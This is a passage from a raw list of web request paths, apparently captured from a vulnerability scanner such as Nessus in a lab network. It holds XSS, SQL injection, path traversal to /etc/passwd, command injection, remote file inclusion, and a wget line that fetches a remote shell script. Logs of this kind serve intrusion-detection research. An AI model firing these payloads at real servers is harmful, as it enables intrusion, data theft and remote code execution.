content=\"testkwlg=5591\">\n/top.php?stuff=\"ping\\x09-w\\x0911000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/examples/servlets/servlet/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/scripts/tsweb.asp\n/8x6w469u.exe?<script>document.cookie=\"testgfjr=1286;\"</script>\n/en-us/7o5qp766.fts?<script>cross_site_scripting.nasl</script>\n/awstatstotals/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+n+ctdnu.com+>ctdn\n/bzuf9ozq.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jscript3/\n/quagynka.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/h5i6crm3.x?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/shops/sub.asp?isub=duamazon_sql_injections.nasl'\n/jw64yq8u.jsp?<script>document.cookie=\"testylfu=1313;\"</script>\n/javascript/document.dat\n/cgis/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/en-us/7o5qp766.php3?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/h5sc3gxy.asp?<script>cross_site_scripting.nasl</script>\n/help.php?q='&rm q89912813 #\n/main.php?logout=\"&del q75783223&rem \n/0u75ldxq.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/8t9v8k7x.kspx?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/en-us/account/cvslog.cgi?file=<script>window.alert</script>\n/cacti/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/scripts/view.php?pg=foobar\n/3m5knyc4.cfc?<script>document.cookie=\"testbgqj=6434;\"</script>\n/jdx255ea.cfm?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,595479233,0,0,0,0,0--\n/index.php?catid=&lt;script&gt;alert('vulnerable')&lt;/script&gt;\n/d765w06j.htm?<script>cross_site_scripting.nasl</script>\n//a=\"%3cscript%20src=%27http://www.example.com/test?rnd=q54789313%27%3e%3c%2fscript%3e\";document.writeln(unescape(a))\n/examples/jsp/checkbox/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/lookup_result.asp?domain=<script>alert(412375577741)</script>&tld=.com&user=&selecte=&word1=&word2=&word3=&choix=&option1=&option2=\n/cgi-win/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/main.php?g2_itemid=../../../../../license\\x00\n/edzaia0i.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/subscriptions_np1/\n/bn857frh.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\nftp://127.0.0.1/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/azcrfs8d.php3?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/iv5vkgam.fts?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/5qnlm5z2.mscgi?<script>document.cookie=\"testsixi=8451;\"</script>\n/help.php?q='|sleep\\x098\\x09#\n/t3af3tdz.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/gvx7m5ti.html?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/main.php?logout=';uname\\x09>q16263765\\x09#\nftp://192.168.28.103/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/v3axg1p8.cfc?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/javascript/htpasswd.err\n/javascript/unsubscribe.exe\n/examples/jsp/cal/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/t3af3tdz.jsp?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&ver\\xa0>q49941678&rem\\xa0\n/en-us/account/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/using logon scripts figure 61102332855146/\n/ybz5rz7a.dll?<script>document.cookie=\"testsbvw=6289;\"</script>\n/tuwjta1w.fts?<script>document.cookie=\"testpokn=7494;\"</script>\n/en-us/dda2qr7j.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}echo(md5('xoops_2_3_2brce'));function+v\n/phptonuke.php?filnavn=/etc/passwd\n/help.php?q=\"&ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n//<body><script src=http://www.example.com/test?rnd=q66748124></script>\n/t3af3tdz.cfm?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"del q82754698 #\n/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.118:8080/zz5thkvtmlgl?\n<script>document.cookie=\"testtfvh=2141;\"</script>\n/main.php?stuff=\"&uname\\x09>q91551817\\x09#\n/1qwv2p5p.php3?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/examples/jsp/error/topic.php?tid='select\n/examples/jsp/checkbox/showproduct.php?product=1'\n/qb2xy9aw.dll?<script>cross_site_scripting.nasl</script>\n/cgi-perl/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/examples/jsp/error/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/help.php?q='\\x0auname >q19373947 #\n/forum.asp?n=c:\\boot.ini|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;c:&#039;.\n/workarea/contentratinggraph.aspx?type=time&view=day&res_type=content&res=1' and cms400_res_sql_injection.nasl --&enddate=5/10/2008 12:00:00 am\n/msmsgsin.exe/\n/cgi-bin/shopaddtocart.asp?productid='42\n/mpcgi/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/scripts/index.php?board=nonexistant1755399079\n/main.php?frm_daynight=day&frm_passwd=q42292951&frm_referer=http%3a//192.168.28.202/&frm_user=&scr_height=&scr_width=\n/main.php?stuff=|ping;-w;7000;-n;1;1.2.3.4|rem;\n/0u75ldxq.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"&ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/examples/servlets/servlet/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/scripts/1332009300-ror_session_fixation.nasl\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919143&lang_crm=../../../../../../../../../../../..//boot.ini\\x00\n/user.php?caselist[bad_file.txt][path]=http://192.168.202.96:8080/4dckqcc0acprbz?&command=cat /etc/passwd\n/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--\n/<script>document.cookie=\"testydan=5106;\"</script>\n/cgi-bin/bb-hist.sh?histfile=../../../../../etc/passwd\n/m4kkjf8l.cfm?<script>document.cookie=\"testyglc=8988;\"</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;chmod+555+/tmp/btnvlgnsgo;\"\n/examples/jsp/jsp2/jspx/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/cal/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/\"user centric identity\"/\n/modules.php?name=news&op=rate_complete&sid=1' and 1=0 union/**/ select 'sqlinjection_test&score=5\n/metakeywordsanddescriptions/\n/edzaia0i.cfm?<script>cross_site_scripting.nasl</script>\n/javascript/priv.exe\n<script>document.cookie=\"testjpdr=9205;\"</script>\n/scripts/www/delivery/ac.php?bannerid=-636+or+1=1\n/manager?username=\"<script>foo</script\n/scripts/index.php?module=ew_filemanager&type=admin&func=manager\n/main.php?logout=\"ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/examples/jsp/cal/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/0qhcnefz.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/examples/jsp/jsp2/jspx/fxm.exe\n/top.php?stuff=;del q28242581 #\n/cgi-915/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/qczkquis.nsf?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/jnt3f86c.do?<script>document.cookie=\"testcmax=9270;\"</script>\n/exampleswebapp/interactivequery.jsp?person=<script>alert('vulnerable')</script>\n/index.php?req=<script>alert('wvs-xss-magic-string-411516083437')</script>submit=submit\n/hrttz9fj.pl?<script>document.cookie=\"testtbjy=7334;\"</script>\n/iisadmpwd/..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/main.php?logout=uname\\x09>q88531476\\x09#\n/manager/shopper.cgi?newpage=../../../../../../etc/passwd\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/ghl9il?\\x00\n/o6ebbirj.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/u8yiqilu.idc?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/cgi.cgi/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/phpmyadmin/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/scriptin-1/\n/top.php?stuff=\"|ping;-w;11000;-n;1;4.3.2.1|rem;\n/acart2_0/admin/index.asp?msg=<script>alert(\\\"test\\\")</script>\n/help.php?q=ping;-w;8000;-n;1;4.3.2.1&rem;\n/odzk29aa.php?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/cacti/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/scripts/t99iadgtkf9h.shtml\n/zv8tv7h8.exe?<script>document.cookie=\"testcqwz=9752;\"</script>\n/cgi-bin/index.php?src=1&_common=1&time=1331905227&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/error/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/javascript/story.exe\n/top.php?stuff=\"&ping -w 11000 -n 1 1.2.3.4&rem \n/yver8r9o.do?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/scgi-bin/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+e0+00+8e+81+0b+01+02+19+00+02+00+00+00+04+00+00+00+00+00+00+00+10+00+00++>>esbq\n/examples/jsp/sessions/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/scgi-bin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/jujgxwav.pl?<script>document.cookie=\"testknim=9383;\"</script>\n/examples/jsp/jsp2/jspx/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/javascript/catinfo.exe\n/modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini\n/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('vulnerable')</script>\n/main.php?stuff=ver;>q76531174&rem;\n/phpmyadmin/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/cgi-bin/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/copatranscript_20061023/\n/pxagj7n7.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/82q7ywa8.jsp?<script>document.cookie=\"testpwew=1315;\"</script>\n/examples/jsp/colors/cal_week.php?op=week&catview=999'\n/admin/operators.php?projectissueid=\"><script>alert(412546083479)</script><\"\n/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd\\x00\n/en-us/<script>cross_site_scripting.nasl</script>.x\n/help.php?q=\";rm q69686889 #\n/javascript/poc.exe\n/examples/jsp/cal/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--\n/6dlc2zm9.cgi?<script>document.cookie=\"testqpux=4016;\"</script>\n/scripts/callboth.php?seq=654321&out=123456&in=1331904232@nessus\\x0d\\x0aasteridex_in_code_injection.nasl\n/nuh3zirz.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7o5qp766.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/yacs/scripts/update_trailer.php?context[path_to_root]=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/examples/jsp/sessions/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\\x00\n/examples/jsp/jsp2/el/sendcard.php?view=1&id='sendcard_sql.nasl\n/main.php?stuff=ping;-w;9000;-n;1;4.3.2.1|rem;\n/javascript/cards.exe\n/scriptpath/index.php?page=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/examples/jsp/error/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/cacti/index.php?module=<script>foo</script>\n/javascript/cocoon.exe\n/main.php?logout=\";sleep\\x097\\x09#\n/i7prbs22.cfc?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/jackrabbit/search.jsp?q=%\"<script>alert(1331908793)</script>\n/ap58k3ci.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/rymojltfjq0;'); function v\n/b4vng02k.cfm?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/scripts/cvsweb.cgi/\n/cgi-local/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/phpmyadmin/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/ht8pn8uq.dll?<script>cross_site_scripting.nasl</script>\n/r3le3om5.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/ion-p.exe?page=../../../../../etc/passwd\n/javascript/document.pm\n/scripts/hivjyzlc.exe\n/manager/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/javascript/attic.exe\n/a0imiuf1.idc?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/help.php?q=;rm\\x09q36511176\\x09#\n/iv5vkgam.htm?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/admin/common/script.js.php.~1~\n<meta http-equiv=set-cookie content=\"testknim=9383\">\n/cgi-bin/sgdynamo.exe?htname=<script>foo</script>\n/scripts/guestbook/cfooter.php3\n/en-us/account/snpfiltered.pl?t=c&u=<script>foo</script>\n/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332008329',null,null,null,null --\n/169okeyj.mscgi?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/javascript/libs.exe\n/top.php?stuff=\"&rm;q42621598&rem;\n/scripts/includer.cgi?template=includer_rcmdexec.nasl\n<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/test.php?evalme=eval($_server[http_x_slmroetlrezvxzaf]);\n/examples/jsp/checkbox/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/javascript/wow.exe\n/zqqemp6j.do?<script>cross_site_scripting.nasl</script>\n/textdescriptors/\n/scripts/shop.plx/page=nessus1529511011\n/main.php?stuff=\"del,q47628643&rem,\n/bin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/examples/jsp/jsp2/el/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/webdav/c99.php?act=f&f=snort_2_9_2_1_installer.exe&ft=download&d=c:\\users\\administrator\\desktop\n/i686v90l.dll?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/nav_subscriptions/\n/includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.118:8080/zz5thkvtmlgl?\n/en-us/esmozg5d.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\\x00\n/help.php?q='\\x0drm\\x09q24981853\\x09#\n/fc9t54l7.nsf?<script>document.cookie=\"testggad=2000;\"</script>\n/scripts/profil.php?id=1 <script>foo</script>\n/scripts/vhost.php?action=logout&time=1332008315\n/examples/jsp/jsp2/jspx/whois.cgi?action=load&whois=;id\n/javascript/email.exe\n/examples/jsp/error/secure.php?cfgprogdir=/etc/passwd\\x00\n/0z575z74.mscgi?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/bl8sefdm.kspx?<script>cross_site_scripting.nasl</script>\n/t3af3tdz.asp?<script>cross_site_scripting.nasl</script>\n/javascript/esale.exe\n/?<script>document.cookie=\"testkgqo=204;\"</script>\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.jspa\n/9o6g5vkn.x?<script>cross_site_scripting.nasl</script>\n/administrator/gallery/uploadimage.php?directory=\\\"<script>alert(document.cookie)</script>\n/main.php?stuff=\"\\x0dsleep 11 #\n/x7pclv4s.nsf?<script>document.cookie=\"testiulz=3709;\"</script>\n/6dlc2zm9.jspa?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/gvx7m5ti.kspx?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/examples/jsp/cal/index.php?cid='\n/main.php?stuff=\"\\x0adel q55324883 #\n/xssattacks/\n/top.php?stuff=&ver;>q55714714&rem;\n/o1zj4u9v.fts?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/07_scripted/\n/cgi-bin/fileseek.cgi?head=;cat /etc/passwd|&foot=\n/nyjgaorz.fts?<script>cross_site_scripting.nasl</script>\n/manager/install.php?newlang=../../cpg_error.log\\x00\n/javascript/htpasswd.rar\n/dslpwt15.cfc?<script>document.cookie=\"testtkio=5454;\"</script>\n/update_script/\n/en-us/h5sc3gxy.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/index.php?id='\n/scripts/search.scr.php?globals[pth][classes]=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/mod_membre/inscription.php?chemin=http://192.168.202.96:8080/4dckqcc0acprbz??\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n/7o5qp766.pl?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/newsscript.pl?mode=admin\n/?<script>document.cookie=\"testggad=2000;\"</script>\n/hrttz9fj.html?<script>document.cookie=\"testtbjy=7334;\"</script>\n/copatranscript_20061109/\n/phpmyadmin/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/en-us/account/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/examples/jsp/jsp2/jspx/index.php?module=<script>foo</script>\n/javascript/base.exe\n/javascript/admin.exe\n/help.php?q='sleep\\x097\\x09#\n/examples/jsp/colors/index.php?cat='\n/en-us/account/way-board/way-board.cgi?db=/etc/passwd\\x00\n/cgis/vssetcookie.exe\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/main.php%3fstuff%3d1985387140&frm_user=q68976489&scr_height=&scr_width=\n/scripts/gallery/displaycategory.php?basepath=http://xxxxxxxx\n/citizen's guide to crime reporting/\n/cgi-local/vssetcookie.exe\n/fpnpp5zg.asp?<meta http-equiv=set-cookie content=\"testyias=101\">\n/www/delivery/ac.php?bannerid=-1331905039+or+1=1+--+';passthru(base64_decode($_server[http_nessus_jtipnlkz]));die;/*\n/examples/jsp/jsp2/el/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/javascript/functions.exe\n/<script>document.cookie=\"testxllt=9940;\"</script>\n/help.php?q=uname >q89616884 #\n/scripts/samples/search/author.idq\n/javascript/custom.exe\n/zmvq66jy.exe?<script>cross_site_scripting.nasl</script>\n/bzuf9ozq.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/replication.exe\n/ybz5rz7a.mscgi?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/1qwv2p5p.dll?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/scripts/c0kha6w3apd3.php\n/iktok2bw.asp?<script>cross_site_scripting.nasl</script>\n/scripts/rih28haesl0j.asp\n/d7ktpmcq.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/subscriptions.ws\n/main.php?stuff='\\x0auname >q31711746 #\n/javascript/dms0.exe\n/recordings/?user=jffnms_user_sql_injection.nasl' union select 2,'admin','$1$rxs1rotx$iza1s3fccfyvfa9rwkbmi.','administrator'--&file=index&pass=\n/subscriptions.csv\n/subscriptions.xslt\n/fc9t54l7.html?<script>document.cookie=\"testggad=2000;\"</script>\n/top.php?stuff=\"&ver >q51692947&rem \n/javascript/websvn.exe\n/scripts/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/q703m78q.cgi?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/scripts/starnet/addons/slideshow_full.php?album_name='1085138732\n/scripts/modules.php?name=my_egallery\n/help.php?q=|ping;-w;9000;-n;1;4.3.2.1|rem;\n/fcgi-bin/testcgi.exe\n/en-us/account/sgdynamo.exe?htname=<script>foo</script>\n/confirmunsubscription.php?output=http://192.168.202.96:8080/llumt7msyau5y?\n/g8nu2yy7.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/7o5qp766.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/documentation.html?phpmyadmin=.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd\n/6qbynt4f.html?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/detail.asp?nchannel='1\n/aj3pf49c.mscgi?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/fo564rei.fts?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/index.php?show=/etc/passwd\n/examples/jsp/sessions/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/scripts/admin/setup.php\n/javascript/.htpasswd.sfish/0000012345\n<script>document.cookie=\"testwldz=3506;\"</script>\n/?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/qczkquis.exe?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/cgi-win/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/?<script>document.cookie=\"testydan=5106;\"</script>\n/help.php?q=rm;q25171792&rem;\n/script_path/config.inc.php?_path=http://192.168.202.96:8080/no4ghqiguzhst??\n/javascript/.htpasswd.sfish/'`false`'\n/error/\\..\\..\\..\\..\\autoexec.bat\n/help.php?q=\"\\x0adel q61288617 #\n/javascript/select.exe\n/8t9v8k7x.fts?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/javascript/blogspot.exe\n/examples/servlets/servlet/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/en-us/odzk29aa.cfc?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/awstats/awstats.pl?migrate=|echo;wget -p /tmp/  http://192.168.202.102:80/awsegguqmpi3jn8mvmjdy3ywvcwwaa/jbqahurnly.sh;echo|awstats571393.txt\n/examples/jsp/num/php.cgi?/etc/passwd\n/main.php?logout=&ver\\x0b>q39725894&rem\\x0b\n/webevent.pl?cmd=><script>alert(410716083387)</script>\n/main.php?logout='&uname\\x09>q65543975\\x09#\n/scripts/status.php3\n/examples/jsp/cal/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n<script>document.cookie=\"testtpby=7052;\"</script>\n/9kr0ih0v.dll?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/javascript/promo.exe\n/?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/cacti/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/top.php?stuff=\\x0duname\\x09>q64895542\\x09#\n/main.php?logout=\"ver&rem\\xa0\n/en-us/s7qus4g3.php3?<script>cross_site_scripting.nasl</script>\n/3hlysl2x.jspa?<script>document.cookie=\"testgjbe=8505;\"</script>\n/scripts/t99iadgtkf9h.sh\n/zmvq66jy.cgi?<script>cross_site_scripting.nasl</script>\n/mais_descriptions2/\n/phpmyadmin/index.php?setlang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/jspx/calendar_admin.pl?config=|cat /etc/passwd|\n/help.php?q=uname >q77228311 #\n/t578vqea.jspa?<script>document.cookie=\"testsory=7676;\"</script>\n/3hlysl2x.php?<script>document.cookie=\"testgjbe=8505;\"</script>\n/main.php?stuff=;sleep 11 #\n/cgi-home/.htpasswd\n/if69ddo1.jspa?<script>document.cookie=\"testiabz=5220;\"</script>\n/examples/jsp/error/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/examples/jsp/num/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/prodlist.asp?brand=<script>alert(414416083577);</script>\n/tukodz3j.php3?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/javascript/denied.exe\n/javascript/office.exe\n<script>document.cookie=\"testtbbe=856;\"</script>\n/scripts/nryr3lvrjnwx.php\n/examples/jsp/jsp2/el/whois.cgi?action=load&whois=;id\n/examples/jsp/jsp2/jspx/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/help.php?q='\\x0ddel\\x09q85664498\\x09#\n/j4oqyvga.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/hipkz026.kspx?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/shopaddtocart.asp?productid='42\n/javascript/~nobody.exe\n/examples/jsp/cal/search.jsp?q=%\"<script>alert(1331904373)</script>\n/<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/examples/servlets/servlet/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/phpmyadmin/phptonuke.php?filnavn=/etc/passwd\n/top.php?stuff=\"&rm;q76531491&rem;\n/thvgjebp.htpasswd\n/egaet53a.htm?<script>cross_site_scripting.nasl</script>\n/fw_enscript-1/\n/recordings/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/javascript/politics.exe\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/utxzfzsgat0;'); function v\n/<200505050346/\n/scripts/shop.plx/page=nessus1436606043\n/javascript/phps.exe\n/javascript/docroot.exe\n/help.php?q=';uname\\x09>q26484164\\x09#\n<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/i7prbs22.do?<script>document.cookie=\"testjnre=7328;\"</script>\n/en-us/manager/permissions/launcher/data/ui/nav/default?uri=/servicesns/nobody/xss/data/ui/nav/default\n/i7prbs22.kspx?<script>document.cookie=\"testjnre=7328;\"</script>\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331923204','5'--\n/javascript/option.exe\n/rv98iwjp.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/wihphoto/start.php\n/scripts/apgafvcxoeeh.pl\n/eei78ore.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/7o5qp766.cfc?<script>cross_site_scripting.nasl</script>\n/3m5knyc4.pl?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/subscriptions.rtf\n/egaet53a.nsf?<script>cross_site_scripting.nasl</script>\n/cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/applescripting/\n/vhzmaia2.jsp?<script>document.cookie=\"testkogj=3979;\"</script>\n/scripts/apgafvcxoeeh.inc\n/scripts/piywzua5hwer.cgi\n/bn857frh.cfc?<script>cross_site_scripting.nasl</script>\n/1qwv2p5p.php3?<script>document.cookie=\"testvqcy=252;\"</script>\n/hjdzm96v.php?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/index.php?do=index&dummy=dummy');alert('414165590323');void('\n/scripts/ylrvly9nh_pf.sh\n/l4fz1dqw.php?<script>cross_site_scripting.nasl</script>\n/scripts/modules/phprpc/server.php\n/..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/en-us/9kr0ih0v.jspa?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/includes/phpdig/includes/config.php?relative_script_path=http://cirt.net/rfiinc.txt?\n/cgi-bin/ion-p?page=../../../../../etc/passwd\n/x980t-description/\n/mv8wxfy9.cfm?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/n9xlumt5.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ygkjkngd.pl?<script>document.cookie=\"testnago=4518;\"</script>\n<script>document.cookie=\"testvlau=8517;\"</script>\n/servlet/org.apache.catalina.globals/<script>alert('vulnerable')</script>\n/examples/jsp/checkbox/shopaddtocart.asp?productid='42\n/h5sc3gxy.php3?<script>cross_site_scripting.nasl</script>\n/b5xdqgz2.asp?<img 